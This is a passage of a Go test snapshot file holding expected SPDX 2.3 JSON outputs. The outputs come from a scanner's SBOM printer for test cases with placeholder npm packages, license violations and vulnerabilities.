"relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: 
SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", 
"referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": 
"SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", 
"licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- 
[TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", 
"relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" } ] } --- [TestPrintSPDXResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "5.9.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@5.9.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": 
"SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", 
"licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": 
"SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine2", "SPDXID": "SPDXRef-Package-mine2-", "versionInfo": "3.2.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine2@3.2.5" } ] }, { "name": "mine3", "SPDXID": 
"SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine2-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine2-", "relatedSpdxElement": "NOASSERTION", "relationshipType": 
"CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] }, { "name": "mine3", "SPDXID": "SPDXRef-Package-mine3-", "versionInfo": "0.4.1", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the 
javascript/packagelockjson extractor from /path/to/my/second/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine3@0.4.1" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.3.5", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.3.5" } ] }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/third/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine3-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine3-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": 
"SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/mine1@1.2.3" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-mine1-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-mine1-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", 
"creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "deprecated-pkg", "SPDXID": "SPDXRef-Package-deprecated-pkg-", "versionInfo": "1.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": "NOASSERTION", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/deprecated-pkg@1.0.0" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-", "relatedSpdxElement": "SPDXRef-Package-deprecated-pkg-", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-deprecated-pkg-", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } --- [TestPrintSPDXResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/", "creationInfo": { "creators": [ "Tool: SCALIBR" ], "created": "" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "mine1", "SPDXID": "SPDXRef-Package-mine1-", "versionInfo": "1.2.3", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/packagelockjson extractor from /path/to/my/first/lockfile", "licenseConcluded": "NOASSERTION", "licenseDeclared": 
